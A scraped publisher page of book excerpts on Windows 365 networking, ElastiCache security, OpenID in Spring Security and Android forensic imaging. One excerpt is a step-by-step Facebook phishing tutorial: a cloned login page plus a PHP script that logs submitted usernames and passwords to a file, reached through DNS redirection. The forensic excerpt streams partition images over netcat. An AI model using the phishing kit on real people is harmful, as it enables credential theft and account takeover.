3.9 – Virtual network creation | settings review Now that the virtual network has been created, we can start looking at how we create an ANC in Intune. We will look at the confi guration for both an AADJ and HAADJ network connection. Setting up an AADJ ANC Let's have a look at  how to configure an ANC for  AADJ Cloud PC device : 1. Start by going to Microsoft  Intune | Devices | Windows 365 | Azure network connection.  From here, click on + Create and select Azure AD Join:  Figure 3.10 – Creating an ANC in Windows 365 overview 2. Fill out the required information such as the display name of the connection, the virtual network, and the subnet you would like to integrate with Windows 365. Once that is done, click on Next.                                                                       Figure 3.11 – Creating an AADJ ANC | network details 3. Review the information you have filled in. When you are ready, click Review + create:  Figure 3.12 – Creating an AADJ ANC | settings review Once the ANC has been created, you are now done and should be able to view the connection in the ANC overview. You can now use that virtual network in your provisioning policy.  Figure 3.13 – Windows 365 ANC network overview Setting up a HAADJ ANC A HAADJ network connection is a bit trickier to set up than the previous one. We must ensure the virtual network we are using has a connection with the domain we are trying to join. Once we are sure about that, let's go ahead and create a connection: 1. Visit Microsoft  Intune | Windows 365 | Azure network connection. From here, click on + Create and select Hybrid Azure AD Join.  Figure 3.14 – Creating a HAADJ ANC in Windows 365 | Overview 2. Provide the required information such as  the display name of the connection, the virtual network, and the subnet you would like to integrate with Windows 365. Click Next.  Figure 3.15 – Creating a HAADJ ANC | network details 3. Type the domain name you want the Cloud PCs to join. The Organization Unit field is optional. Type in the AD username and password for your domain-joined service account. Once done, click Next:  Figure 3.16 – Creating a HAADJ ANC | domain details 4. Review the settings provided and click on Review + create. The connection will now be established:  Figure 3.17 – Creating a HAADJ ANC | settings details Once the creation is done, you can view the connection in the ANC overview. You will now be able to use that virtual network in your provisioning policy.  Figure 3.18 – Windows 365 ANC network overview  ConclusionCreating a virtual network in Azure and connecting it to your Windows 365 environment is a fundamental step towards leveraging the full potential of cloud-based services. By following the outlined procedures, you can ensure a secure and efficient network connection, whether you're dealing with Azure AD Join (AADJ) or Hybrid Azure AD Join (HAADJ) scenarios. With the virtual network and ANC now configured, you are well-equipped to manage and monitor your network connections, enhancing the overall performance and reliability of your cloud infrastructure. Author BioChristiaan works as a Principal Program Manager and Community Lead on the Windows Cloud Experiences (Windows 365 + AVD) Engineering team at Microsoft, bringing his expertise to help customers imagine new virtualization experiences. A former Global Black Belt for Azure Virtual Desktop, Christiaan joined Microsoft in 2018 as part of the FSLogix acquisition. In his role at Microsoft, he worked on features such as Windows 365 app, Switch, and Boot. His mission is to drive innovation while bringing Windows 365, Windows, and Microsoft Endpoint Manager (MEM) closer together, and drive community efforts around virtualization to empower Microsoft customers in leveraging new cloud virtualization scenarios.Sandeep is a virtualization veteran with nearly two decades of experience in the industry. He has shipped multiple billion-dollar products and cloud services for Microsoft to a global user base including Windows, Azure Virtual Desktop, and Windows 365. His contributions have earned him multiple patents in this field.Currently, he leads a stellar team that is responsible for building the product strategy for Windows 365 and Azure Virtual Desktop services and shaping the future of end-user experiences for these services.Morten works as a Cloud Architect for a consultant company in Denmark where he advises and implements Microsoft virtual desktop solutions to customers around the world, Morten started his journey as a consultant over 8 years ago where he started with managing client devices but quickly found a passion for virtual device management. Today Windows 365 and Azure Virtual Desktop are the main areas that are being focused on alongside Microsoft Intune. Based on all the community activities Morten has done in the past years, he got rewarded with the Microsoft MVP award in the category of Windows 365 in March 2022.
Read more
  • 0
  • 0
  • 63654

article-image-how-to-secure-elasticcache-in-aws
Savia Lobo
11 May 2018
5 min read
Save for later

How to secure ElasticCache in AWS

Savia Lobo
11 May 2018
5 min read
AWS offers services to handle the cache management process. Earlier, we were using Memcached or Redis installed on VM, which was a very complex and tough task to manage in terms of ensuring availability, patching, scalability, and security. [box type="shadow" align="" class="" width=""]This article is an excerpt taken from the book,'Cloud Security Automation'. In this book, you'll learn the basics of why cloud security is important and how automation can be the most effective way of controlling cloud security.[/box] On AWS, we have this service available as ElastiCache. This gives you the option to use any engine (Redis or Memcached) to manage your cache. It's a scalable platform that will be managed by AWS in the backend. ElastiCache provides a scalable and high-performance caching solution. It removes the complexity associated with creating and managing distributed cache clusters using Memcached or Redis. Now, let's look at how to secure ElastiCache. Secure ElastiCache in AWS For enhanced security, we deploy ElastiCache clusters inside VPC. When they are deployed inside VPC, we can use a security group and NACL to add a level of security on the communication ports at network level. Apart from this, there are multiple ways to enable security for ElastiCache. VPC-level security Using a security group at VPC—when we deploy AWS ElastiCache in VPC, it gets associated with a subnet, a security group, and the routing policy of that VPC. Here, we define a rule to communicate with the ElastiCache cluster on a specific port. ElastiCache clusters can also be accessed from on-premise applications using VPN and Direct Connect. Authentication and access control We use IAM in order to implement the authentication and access control on ElastiCache. For authentication, you can have the following identity type: Root user: It's a superuser that is created while setting up an AWS account. It has super administrator privileges for all the AWS services. However, it's not recommended to use the root user to access any of the services. IAM user: It's a user identity in your AWS account that will have a specific set of permissions for accessing the ElastiCache service. IAM role: We also can define an IAM role with a specific set of permissions and associate it with the services that want to access ElastiCache. It basically generates temporary access keys to use ElastiCache. Apart from this, we can also specify federated access to services where we have an IAM role with temporary credentials for accessing the service. To access ElastiCache, service users or services must have a specific set of permissions such as create, modify, and reboot the cluster. For this, we define an IAM policy and associate it with users or roles. Let's see an example of an IAM policy where users will have permission to perform system administration activity for ElastiCache cluster: { "Version": "2012-10-17", "Statement":[{ "Sid": "ECAllowSpecific", "Effect":"Allow", "Action":[ "elasticache:ModifyCacheCluster", "elasticache:RebootCacheCluster", "elasticache:DescribeCacheClusters", "elasticache:DescribeEvents", "elasticache:ModifyCacheParameterGroup", "elasticache:DescribeCacheParameterGroups", "elasticache:DescribeCacheParameters", "elasticache:ResetCacheParameterGroup", "elasticache:DescribeEngineDefaultParameters"], "Resource":"*" } ] } Authenticating with Redis authentication AWS ElastiCache also adds an additional layer of security with the Redis authentication command, which asks users to enter a password before they are granted permission to execute Redis commands on a password-protected Redis server. When we use Redis authentication, there are the following few constraints for the authentication token while using ElastiCache: Passwords must have at least 16 and a maximum of 128 characters Characters such as @, ", and / cannot be used in passwords Authentication can only be enabled when you are creating clusters with the in-transit encryption option enabled The password defined during cluster creation cannot be changed To make the policy harder or more complex, there are the following rules related to defining the strength of a password: A password must include at least three characters of the following character types: Uppercase characters Lowercase characters Digits Non-alphanumeric characters (!, &, #, $, ^, <, >, -) A password must not contain any word that is commonly used A password must be unique; it should not be similar to previous passwords Data encryption AWS ElastiCache and EC2 instances have mechanisms to protect against unauthorized access of your data on the server. ElastiCache for Redis also has methods of encryption for data run-in on Redis clusters. Here, too, you have data-in-transit and data-at-rest encryption methods. Data-in-transit encryption ElastiCache ensures the encryption of data when in transit from one location to another. ElastiCache in-transit encryption implements the following features: Encrypted connections: In this mode, SSL-based encryption is enabled for server and client communication Encrypted replication: Any data moving between the primary node and the replication node are encrypted Server authentication: Using data-in-transit encryption, the client checks the authenticity of a connection—whether it is connected to the right server Client authentication: After using data-in-transit encryption, the server can check the authenticity of the client using the Redis authentication feature Data-at-rest encryption ElastiCache for Redis at-rest encryption is an optional feature that increases data security by encrypting data stored on disk during sync and backup or snapshot operations. However, there are the following few constraints for data-at-rest encryption: It is supported only on replication groups running Redis version 3.2.6. It is not supported on clusters running Memcached. It is supported only for replication groups running inside VPC. Data-at-rest encryption is supported for replication groups running on any node type. During the creation of the replication group, you can define data-at-rest encryption. Data-at-rest encryption once enabled, cannot be disabled. To summarize, we learned how to secure ElastiCache and ensured security for PaaS services, such as database and analytics services. If you've enjoyed reading this article, do check out 'Cloud Security Automation' for hands-on experience of automating your cloud security and governance. How to start using AWS AWS Sydney Summit 2018 is all about IoT AWS Fargate makes Container infrastructure management a piece of cake    
Read more
  • 0
  • 0
  • 50680

article-image-facebook-password-phishing-dns-manipulation-tutorial
Savia Lobo
09 Jul 2018
6 min read
Save for later

Phish for Facebook passwords with DNS manipulation [Tutorial]

Savia Lobo
09 Jul 2018
6 min read
Password Phishing can result in huge loss of identity and user's confidential details. This could result in financial losses for users and can also prevent them from accessing their own accounts. In this article,  we will see how an attacker can take advantage of manipulating the DNS record for Facebook, redirect traffic to the phishing page, and grab the account password. This article is an excerpt taken from 'Python For Offensive PenTest' written by Hussam Khrais.  Facebook password phishing Here, we will see how an attacker can take advantage of manipulating the DNS record for Facebook, redirect traffic to the phishing page, and grab the account password. First, we need to set up a phishing page. You need not be an expert in web programming. You can easily Google the steps for preparing a phishing account. To create a phishing page, first open your browser and navigate to the Facebook login page. Then, on the browser menu, click on File and then on Save page as.... Then, make sure that you choose a complete page from the drop-down menu. The output should be an .html file. Now let's extract some data here. Open the Phishing folder from the code files provided with this book. Rename the Facebook HTML page index.html. Inside this HTML, we have to change the login form. If you search for action=, you will see it. Here, we change the login form to redirect the request into a custom PHP page called login.php. Also, we have to change the request method to GET instead of POST. You will see that I have added a login.php page in the same Phishing directory. If you open the file, you will find the following script: <?php header("Location: http://www.facebook.com/home.php? "); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ?> As soon as our target clicks on the Log In button, we will send the data as a GET request to this login.php and we will store the submitted data in our passwords.txt file; then, we will close it. Next, we will create the passwords.txt file, where the target credentials will be stored. Now, we will copy all of these files into varwww and start the Apache services. If we open the index.html page locally, we will see that this is the phishing page that the target will see. Let's recap really quickly what will happen when the target clicks on the Log In button? As soon as our target clicks on the Log In button, the target's credentials will be sent as GET requests to login.php. Remember that this will happen because we have modified the action parameter to send the credentials to login.php. After that, the login.php will eventually store the data into the passwords.txt file. Now, before we start the Apache services, let me make sure that we get an IP address. Enter the following command: ifconfig eth0 You can see that we are running on 10.10.10.100 and we will also start the Apache service using: service apache2 start Let's verify that we are listening on port 80, and the service that is listening is Apache: netstat -antp | grep "80" Now, let's jump to the target side for a second. In our previous section, we have used google.jo in our script. Here, we have already modified our previous script to redirect the Facebook traffic to our attacker machine. So, all our target has to do is double-click on the EXE file. Now, to verify: Let us start Wireshark and then start the capture. We will filter on the attacker IP, which is 10.10.10.100: Open the browser and navigate to https://www.facebook.com/: Once we do this, we're taken to the phishing page instead. Here, you will see the destination IP, which is the Kali IP address. So, on the target side, once we are viewing or hitting https://www.facebook.com/, we are basically viewing index.html, which is set up on the Kali machine. Once the victim clicks on the login page, we will send the data as a GET request to login.php, and we will store it into passwords.txt, which is currently empty. Now, log into your Facebook account using your username and password. and jump on the Kali side and see if we get anything on the passwords.txt file. You can see it is still empty. This is because, by default, we have no permission to write data. Now, to fix this, we will give all files full privilege, that is, to read, write, and execute: chmod -R 777 /var/www/ Note that we made this, since we are running in a VirtualBox environment. If you have a web server exposed to the public, it's bad practice to give full permission to all of your files due to privilege escalation attacks, as an attacker may upload a malicious file or manipulate the files and then browse to the file location to execute a command on his own. Now, after giving the permission, we will stop and start the Apache server just in case: service apache2 stop service apache2 start After doing this modification, go to the target machine and try to log into Facebook one more time. Then, go to Kali and click on passwords.txt. You will see the submitted data from the target side, and we can see the username and the password. In the end, a good sign for a phishing activity is missing the https sign. We performed the password phishing process using Python. If you have enjoyed reading this excerpt, do check out 'Python For Offensive PenTest' to learn how to protect yourself and secure your account from these attacks and code your own scripts and master ethical hacking from scratch. Phish for passwords using DNS poisoning [Tutorial] How to secure a private cloud using IAM How cybersecurity can help us secure cyberspace
Read more
  • 0
  • 0
  • 46389
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-extracting-data-physically-dd
Packt
30 Apr 2015
10 min read
Save for later

Extracting data physically with dd

Packt
30 Apr 2015
10 min read
 In this article by Rohit Tamma and Donnie Tindall, authors of the book Learning Android Forensics, we will cover physical data extraction using free and open source tools wherever possible. The majority of the material covered in this article will use the ADB methods. (For more resources related to this topic, see here.) The dd command should be familiar to any examiner who has done traditional hard drive forensics. The dd command is a Linux command-line utility used by definition to convert and copy files, but is frequently used in forensics to create bit-by-bit images of entire drives. Many variations of the dd commands also exist and are commonly used, such as dcfldd, dc3dd, ddrescue, and dd_rescue. As the dd command is built for Linux-based systems, it is frequently included on Android platforms. This means that a method for creating an image of the device often already exists on the device! The dd command has many options that can be set, of which only forensically important options are listed here. The format of the dd command is as follows: dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 conv=notrunc,noerror,sync if: This option specifies the path of the input file to read from. of: This option specifies the path of the output file to write to. bs: This option specifies the block size. Data is read and written in the size of the block specified, defaults to 512 bytes if not specified. conv: This option specifies the conversion options as its attributes: notrunc: This option does not truncate the output file. noerror: This option continues imaging if an error is encountered. sync: In conjunction with the noerror option, this option writes x00 for blocks with an error. This is important for maintaining file offsets within the image. Do not mix up the if and of flags, this could result in overwriting the target device! A full list of command options can be found at http://man7.org/linux/man-pages/man1/dd.1.html. Note that there is an important correlation between the block size and the noerror and sync flags: if an error is encountered, x00 will be written for the entire block that was read (as determined by the block size). Thus, smaller block sizes result in less data being missed in the event of an error. The downside is that, typically, smaller block sizes result in a slower transfer rate. An examiner will have to decide whether a timely or more accurate acquisition is preferred. Booting into recovery mode for the imaging process is the most forensically sound method. Determining what to image When imaging a computer, an examiner must first find what the drive is mounted as; /dev/sda, for example. The same is true when imaging an Android device. The first step is to launch the ADB shell and view the /proc/partitions file using the following command: cat /proc/partitions The output will show all partitions on the device: In the output shown in the preceding screenshot, mmcblk0 is the entirety of the flash memory on the device. To image the entire flash memory, we could use /dev/blk/mmcblk0 as the input file flag (if) for the dd command. Everything following it, indicated by p1- p29, is a partition of the flash memory. The size is shown in blocks, in this case the block size is 1024 bytes for a total internal storage size of approximately 32 GB. To obtain a full image of the device's internal memory, we would run the dd command with mmcblk0 as the input file. However, we know that most of these partitions are unlikely to be forensically interesting; we're most likely only interested in a few of them. To view the corresponding names for each partition, we can look in the device's by-name directory. This does not exist on every device, and is sometimes in a different path, but for this device it is found at /dev/block/msm_sdcc.1/by-name. By navigating to that directory and running the ls -al command, we can see to where each block is symbolically linked as shown in the following screenshot: If our investigation was only interested in the userdata partition, we now know that it is mmcblk0p28, and could use that as the input file to the dd command. If the by-name directory does not exist on the device, it may not be possible to identify every partition on the device. However, many of them can still be found by using the mount command within the ADB shell. Note that the following screenshot is from a different device that does not contain a by-name directory, so the data partition is not mmcblk0p28: On this device, the data partition is mmcblk0p34. If the mount command does not work, the same information can be found using the cat /proc/mounts command. Other options to identify partitions depending on the device are the cat /proc/mtd or cat /proc/yaffs commands; these may work on older devices. Newer devices may include an fstab file in the root directory (typically called fstab.<device>) that will list mountable partitions. Writing to an SD card The output file of the dd command can be written to the device's SD card. This should only be done if the suspect SD card can be removed and replaced with a forensically sterile SD to ensure that the dd command's output is not overwriting evidence. Obviously, if writing to an SD card, ensure that the SD card is larger than the partition being imaged. On newer devices, the /sdcard partition is actually a symbolic link to /data/media. In this case, using the dd command to copy the /data partition to the SD card won't work, and could corrupt the device because the input file is essentially being written to itself. To determine where the SD card is symbolically linked to, simply open the ADB shell and run the ls -al command. If the SD card partition is not shown, the SD likely needs to be mounted in recovery mode using the steps shown in this article, Extracting Data Logically from Android Devices. In the following example, /sdcard is symbolically linked to /data/media. This indicates that the dd command's output should not be written to the SD card. In the example that follows, the /sdcard is not a symbolic link to /data, so the dd command's output can be used to write the /data partition image to the SD card: On older devices, the SD card may not even be symbolically linked. After determining which block to read and to where the SD card is symbolically linked, image the /data partition to the /sdcard, using the following command: dd if=/dev/block/mmcblk0p28 of=/sdcard/data.img bs=512 conv=notrunc,noerror,sync Now, an image of the /data partition exists on the SD card. It can be pulled to the examiner's machine with the ADB pull command, or simply read from the SD card. Writing directly to an examiner's computer with netcat If the image cannot be written to the SD card, an examiner can use netcat to write the image directly to their machine. The netcat tool is a Linux-based tool used for transferring data over a network connection. We recommend using a Linux or a Mac computer for using netcat as it is built-in, though Windows versions do exist. The examples below were done on a Mac. Installing netcat on the device Very few Android devices, if any, come with netcat installed. To check, simply open the ADB shell and type nc. If it returns saying nc is not found, netcat will have to be installed manually on the device. Netcat compiled for Android can be found at many places online. We have shared the version we used at http://sourceforge.net/projects/androidforensics-netcat/files/. If we look back at the results from our mount command in the previous section, we can see that the /dev partition is mounted as tmpfs. The Linux term tmpfs means that the partition is meant to appear as an actual filesystem on the device, but is truly only stored in RAM. This means we can push netcat here without making any permanent changes to the device using the following command on the examiner's computer: adb push nc /dev/Examiner_Folder/nc The command should have created the Examiner_Folder in /dev, and nc should be in it. This can be verified by running the following command in the ADB shell: ls /dev/Examiner_Folder Using netcat Now that the netcat binary is on the device, we need to give it permission to execute from the ADB shell. This can be done as follows: chomd +x /dev/Examiner_Folder/nc We will need two terminal windows open with the ADB shell open in one of them. The other will be used to listen to the data being sent from the device. Now we need to enable port forwarding over ADB from the examiner's computer: adb forward tcp:9999 tcp:9999 9999 is the port we chose to use for netcat; it can be any arbitrary port number between 1023 and 65535 on a Linux or Mac system (1023 and below are reserved for system processes, and require root permission to use). Windows will allow any port to be assigned. In the terminal window with ADB shell, run the following command: dd if=/dev/block/mmcblk0p34 bs=512 conv=notrunc,noerror,sync | /dev/Examiner_Folder/nc –l –p 9999 mmcblk0p34 is the user data partition on this device, however, the entire flash memory or any other partition could also be imaged with this method. In most cases, it is best practice to image the entirety of the flash memory in order to acquire all possible data from the device. Some commercial forensic tools may also require the entire memory image, and may not properly handle an image of a single partition. In the other terminal window, run: nc 127.0.0.1 9999 > data_partition.img The data_partition.img file should now be created in the current directory of the examiner's computer. When the data is finished transferring, netcat in both terminals will terminate and return to the command prompt. The process can take a significant amount of time depending on the size of the image. Summary This article discussed techniques used for physically imaging internal memory or SD cards and some of the common problems associated with dd are as follows: Usually pre-installed on device May not work on MTD blocks Does not obtain Out-of-Band area Additionally, each imaging technique can be used to either save the image on the device (typically on the SD card), or used with netcat to write the file to the examiner's computer: Writing to SD card: Easy, doesn't require additional binaries to be pushed to the device Familiar to most examiners Cannot be used if SD card is symbolically linked to the partition being imaged Cannot be used if the entire memory is being imaged Using netcat: Usually requires yet another binary to be pushed to the device Somewhat complicated, must follow steps exactly Works no matter what is being imaged May be more time consuming than writing to the SD Resources for Article: Further resources on this subject: Reversing Android Applications [article] Introduction to Mobile Forensics [article] Processing the Case [article]
Read more
  • 0
  • 0
  • 43871

article-image-opening-openid-spring-security
Packt
27 May 2010
7 min read
Save for later

Opening up to OpenID with Spring Security

Packt
27 May 2010
7 min read
(For more resources on Spring, see here.) The promising world of OpenID The promise of OpenID as a technology is to allow users on the web to centralize their personal data and information with a trusted provider, and then use the trusted provider as a delegate to establish trustworthiness with other sites with whom the user wants to interact. In concept, this type of login through a trusted third party has been in existence for a long time, in many different forms (Microsoft Passport, for example, became one of the more notable central login services on the web for some time). OpenID's distinct advantage is that the OpenID Provider needs to implement only the public OpenID protocol to be compatible with any site seeking to integrate login with OpenID. The OpenID specification itself is an open specification, which leads to the fact that there is currently a diverse population of public providers up and running the same protocol. This is an excellent recipe for healthy competition and it is good for consumer choice. The following diagram illustrates the high-level relationship between a site integrating OpenID during the login process and OpenID providers. We can see that the user presents his credentials in the form of a unique named identifier, typically a Uniform Resource Identifier (URI), which is assigned to the user by their OpenID provider, and is used to uniquely identify both the user and the OpenID provider. This is commonly done by either prepending a subdomain to the URI of the OpenID provider (for example, https://jamesgosling.myopenid.com/), or appending a unique identifier to the URI of the OpenID provider URI (for example, https://me.yahoo.com/jamesgosling). We can visually see from the presented URI that both methods clearly identify both the OpenID provider(via domain name) and the unique user identifier. Don't trust OpenID unequivocally! You can see here a fundamental assumption that can fool users of the system. It is possible for us to sign up for an OpenID, which would make it appear as though we were James Gosling, even though we obviously are not. Do not make the false assumption that just because a user has a convincing-sounding OpenID (or OpenID delegate provider) they are the authentic person, without requiring additional forms of identification. Thinking about it another way, if someone came to your door just claiming he was James Gosling, would you let him in without verifying his ID? The OpenID-enabled application then redirects the user to the OpenID provider, at which the user presents his credentials to the provider, which is then responsible for making an access decision. Once the access decision has been made by the provider, the provider redirects the user to the originating site, which is now assured of the user's authenticity. OpenID is much easier to understand once you have tried it. Let's add OpenID to the JBCP Pets login screen now! Signing up for an OpenID In order to get the full value of exercises in this section (and to be able to test login), you'll need your own OpenID from one of the many available providers, of which a partial listing is available at http://openid.net/get-an-openid/. Common OpenID providers with which you probably already have an account are Yahoo!, AOL, Flickr, or MySpace. Google's OpenID support is slightly different, as we'll see later in this article when we add Sign In with Google support to our login page. To get full value out of the exercises in this article, we recommend you have accounts with at least: myOpenID Google Enabling OpenID authentication with Spring Security Spring Security provides convenient wrappers around provider integrations that are actually developed outside the Spring ecosystem. In this vein, the openid4java project ( http://code.google.com/p/openid4java/) provides the underlying OpenID provider discovery and request/response negotiation for the Spring Security OpenID functionality. Writing an OpenID login form It's typically the case that a site will present both standard (username and password) and OpenID login options on a single login page, allowing the user to select from one or the other option, as we can see in the JBCP Pets target login page. The code for the OpenID-based form is as follows: <h1>Or, Log Into Your Account with OpenID</h1> <p> Please use the form below to log into your account with OpenID. </p> <form action="j_spring_openid_security_check" method="post"> <label for="openid_identifier">Login</label>: <input id="openid_identifier" name="openid_identifier" size="20" maxlength="100" type="text"/> <img src="images/openid.png" alt="OpenID"/> <br /> <input type="submit" value="Login"/> </form> The name of the form field, openid_identifier, is not a coincidence. The OpenID specification recommends that implementing websites use this name for their OpenID login field, so that user agents (browsers) have the semantic knowledge of the function of this field. There are even browser plug-ins such as Verisign's OpenID SeatBelt ( https://pip.verisignlabs.com/seatbelt.do), which take advantage of this knowledge to pre-populate your OpenID credentials into any recognizable OpenID field on a page. You'll note that we don't offer the remember me option with OpenID login. This is due to the fact that the redirection to and from the vendor causes the remember me checkbox value to be lost, such that when the user's successfully authenticated, they no longer have the remember me option indicated. This is unfortunate, but ultimately increases the security of OpenID as a login mechanism for our site, as OpenID forces the user to establish a trust relationship through the provider with each and every login. Configuring OpenID support in Spring Security Turning on basic OpenID support, via the inclusion of a servlet filter and authentication provider, is as simple as adding a directive to our <http> configuration element in dogstore-security.xml as follows:/   <http auto-config="true" ...> <!-- Omitting content... --> <openid-login/> </http> After adding this configuration element and restarting the application, you will be able to use the OpenID login form to present an OpenID and navigate through the OpenID authentication process. When you are returned to JBCP Pets, however, you will be denied access. This is because your credentials won’t have any roles assigned to them. We’ll take care of this next. Adding OpenID users As we do not yet have OpenID-enabled new user registration, we'll need to manually insert the user account (that we'll be testing) into the database, by adding them to test-users-groups-data.sql in our database bootstrap code. We recommend that you use myOpenID for this step (notably, you will have trouble with Yahoo!, for reasons we'll explain in a moment). If we assume that our OpenID is https://jamesgosling.myopenid.com/, then the SQL that we'd insert in this file is as follows: insert into users(username, password, enabled, salt) values ('https:// jamesgosling.myopenid.com/','unused',true,CAST(RAND()*1000000000 AS varchar)); insert into group_members(group_id, username) select id,'https:// jamesgosling.myopenid.com/' from groups where group_ name='Administrators'; You'll note that this is similar to the other data that we inserted for our traditional username-and password-based admin account, with the exception that we have the value unused for the password. We do this, of course, because OpenID-based login doesn't require that our site should store a password on behalf of the user! The observant reader will note, however, that this does not allow a user to create an arbitrary username and password, and associate it with an OpenID—we describe this process briefly later in this article, and you are welcome to explore how to do this as an advanced application of this technology. At this point, you should be able to complete a full login using OpenID. The sequence of redirects is illustrated with arrows in the following screenshot: We've now OpenID-enabled JBCP Pets login! Feel free to test using several OpenID providers. You'll notice that, although the overall functionality is the same, the experience that the provider offers when reviewing and accepting the OpenID request differs greatly from provider to provider.
Read more
  • 0
  • 2
  • 43643

article-image-mobile-forensics-and-its-challanges
Packt
25 Apr 2016
10 min read
Save for later

Mobile Forensics and Its Challanges

Packt
25 Apr 2016
10 min read
In this article by Heather Mahalik and Rohit Tamma, authors of the book Practical Mobile Forensics, Second Edition, we will cover the following topics: Introduction to mobile forensics Challenges in mobile forensics (For more resources related to this topic, see here.) Why do we need mobile forensics? In 2015, there were more than 7 billion mobile cellular subscriptions worldwide, up from less than 1 billion in 2000, says International Telecommunication Union (ITU). The world is witnessing technology and user migration from desktops to mobile phones. The following figure sourced from statista.com shows the actual and estimated growth of smartphones from the year 2009 to 2018. Growth of smartphones from 2009 to 2018 in million units Gartner Inc. reports that global mobile data traffic reached 52 million terabytes (TB) in 2015, an increase of 59 percent from 2014, and the rapid growth is set to continue through 2018, when mobile data levels are estimated to reach 173 million TB. Smartphones of today, such as the Apple iPhone, Samsung Galaxy series, and BlackBerry phones, are compact forms of computers with high performance, huge storage, and enhanced functionalities. Mobile phones are the most personal electronic device that a user accesses. They are used to perform simple communication tasks, such as calling and texting, while still providing support for Internet browsing, e-mail, taking photos and videos, creating and storing documents, identifying locations with GPS services, and managing business tasks. As new features and applications are incorporated into mobile phones, the amount of information stored on the devices is continuously growing. Mobiles phones become portable data carriers, and they keep track of all your moves. With the increasing prevalence of mobile phones in peoples' daily lives and in crime, data acquired from phones become an invaluable source of evidence for investigations relating to criminal, civil, and even high-profile cases. It is rare to conduct a digital forensic investigation that does not include a phone. Mobile device call logs and GPS data were used to help solve the attempted bombing in Times Square, New York, in 2010. The details of the case can be found at http://www.forensicon.com/forensics-blotter/cell-phone-email-forensics-investigation-cracks-nyc-times-square-car-bombing-case/. The science behind recovering digital evidence from mobile phones is called mobile forensics. Digital evidence is defined as information and data that is stored on, received, or transmitted by an electronic device that is used for investigations. Digital evidence encompasses any and all digital data that can be used as evidence in a case. Mobile forensics Digital forensics is a branch of forensic science focusing on the recovery and investigation of raw data residing in electronic or digital devices. The goal of the process is to extract and recover any information from a digital device without altering the data present on the device. Over the years, digital forensics grew along with the rapid growth of computers and various other digital devices. There are various branches of digital forensics based on the type of digital device involved such as computer forensics, network forensics, mobile forensics, and so on. Mobile forensics is a branch of digital forensics related to the recovery of digital evidence from mobile devices. Forensically sound is a term used extensively in the digital forensics community to qualify and justify the use of particular forensic technology or methodology. The main principle for a sound forensic examination of digital evidence is that the original evidence must not be modified. This is extremely difficult with mobile devices. Some forensic tools require a communication vector with the mobile device, thus a standard write protection will not work during forensic acquisition. Other forensic acquisition methods may involve removing a chip or installing a bootloader on the mobile device prior to extract data for forensic examination. In cases where the examination or data acquisition is not possible without changing the configuration of the device, the procedure and the changes must be tested, validated, and documented. Following proper methodology and guidelines is crucial in examining mobile devices as it yields the most valuable data. As with any evidence gathering, not following the proper procedure during the examination can result in loss or damage of evidence or render it inadmissible in court. The mobile forensics process is broken into three main categories: seizure, acquisition, and examination/analysis. Forensic examiners face some challenges while seizing the mobile device as a source of evidence. At the crime scene, if the mobile device is found switched off, the examiner should place the device in a faraday bag to prevent changes should the device automatically power on. As shown in the following figure, Faraday bags are specifically designed to isolate the phone from the network. A Faraday bag (Image courtesy: http://www.amazon.com/Black-Hole-Faraday-Bag-Isolation/dp/B0091WILY0) If the phone is found switched on, switching it off has a lot of concerns attached to it. If the phone is locked by a PIN or password or encrypted, the examiner will be required to bypass the lock or determine the PIN to access the device. Mobile phones are networked devices and can send and receive data through different sources, such as telecommunication systems, Wi-Fi access points, and Bluetooth. So, if the phone is in a running state, a criminal can securely erase the data stored on the phone by executing a remote wipe command. When a phone is switched on, it should be placed in a faraday bag. If possible, prior to placing the mobile device in the faraday bag, disconnect it from the network to protect the evidence by enabling the flight mode and disabling all network connections (Wi-Fi, GPS, Hotspots, and so on). This will also preserve the battery, which will drain while in a faraday bag and protect against leaks in the faraday bag. Once the mobile device is seized properly, the examiner may need several forensic tools to acquire and analyze the data stored on the phone. Mobile phones are dynamic systems that present a lot of challenges to the examiner in extracting and analyzing digital evidence. The rapid increase in the number of different kinds of mobile phones from different manufacturers makes it difficult to develop a single process or tool to examine all types of devices. Mobile phones are continuously evolving as existing technologies progress and new technologies are introduced. Furthermore, each mobile is designed with a variety of embedded operating systems. Hence, special knowledge and skills are required from forensic experts to acquire and analyze the devices. Challenges in mobile forensics One of the biggest forensic challenges when it comes to the mobile platform is the fact that data can be accessed, stored, and synchronized across multiple devices. As the data is volatile and can be quickly transformed or deleted remotely, more effort is required for the preservation of this data. Mobile forensics is different from computer forensics and presents unique challenges to forensic examiners. Law enforcement and forensic examiners often struggle to obtain digital evidence from mobile devices. The following are some of the reasons: Hardware differences: The market is flooded with different models of mobile phones from different manufacturers. Forensic examiners may come across different types of mobile models, which differ in size, hardware, features, and operating system. Also, with a short product development cycle, new models emerge very frequently. As the mobile landscape is changing each passing day, it is critical for the examiner to adapt to all the challenges and remain updated on mobile device forensic techniques across various devices. Mobile operating systems: Unlike personal computers where Windows has dominated the market for years, mobile devices widely use more operating systems, including Apple's iOS, Google's Android, RIM's BlackBerry OS, Microsoft's Windows Mobile, HP's webOS, Nokia's Symbian OS, and many others. Even within these operating systems, there are several versions which make the task of forensic investigator even more difficult. Mobile platform security features: Modern mobile platforms contain built-in security features to protect user data and privacy. These features act as a hurdle during the forensic acquisition and examination. For example, modern mobile devices come with default encryption mechanisms from the hardware layer to the software layer. The examiner might need to break through these encryption mechanisms to extract data from the devices. Lack of resources: As mentioned earlier, with the growing number of mobile phones, the tools required by a forensic examiner would also increase. Forensic acquisition accessories, such as USB cables, batteries, and chargers for different mobile phones, have to be maintained in order to acquire those devices. Preventing data modification: One of the fundamental rules in forensics is to make sure that data on the device is not modified. In other words, any attempt to extract data from the device should not alter the data present on that device. But this is practically not possible with mobiles because just switching on a device can change the data on that device. Even if a device appears to be in an off state, background processes may still run. For example, in most mobiles, the alarm clock still works even when the phone is switched off. A sudden transition from one state to another may result in the loss or modification of data. Anti-forensic techniques: Anti-forensic techniques, such as data hiding, data obfuscation, data forgery, and secure wiping, make investigations on digital media more difficult. Dynamic nature of evidence: Digital evidence may be easily altered either intentionally or unintentionally. For example, browsing an application on the phone might alter the data stored by that application on the device. Accidental reset: Mobile phones provide features to reset everything. Resetting the device accidentally while examining may result in the loss of data. Device alteration: The possible ways to alter devices may range from moving application 